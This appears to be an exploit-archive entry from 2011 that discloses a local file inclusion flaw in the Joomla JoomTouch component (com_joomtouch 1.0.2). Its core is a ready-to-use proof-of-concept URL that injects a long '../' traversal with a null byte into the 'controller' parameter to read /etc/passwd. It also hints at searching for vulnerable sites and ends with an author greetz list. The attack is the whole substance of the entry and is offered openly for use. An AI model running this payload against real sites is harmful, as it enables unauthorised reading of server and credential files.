[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla JoomTouch Component Local File Inclusion Vulnerability
# Published : 2011-08-17
# Author :
# Previous Title : WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability
# Next Title : WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability
================================================================================
[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability
Software : com_joomtouch ver 1.0.2
Vendor : http://www.joomtouch.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Home : http://evilc0de.blogspot.com/
================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]
[o] PoC
http://localhost/[path]/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00
[o] Dork
be creative.. :))
================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe matthews wishnusakti kaka11 inc0mp13te martfella
pizzyroot Genex H312Y }^-^{ noname tukulesto
================================================================================
[o] August 17 2011 - Papua, Indonesia
[o] Hiduplah Indonesia Raya.. MERDEKA!! ^_____^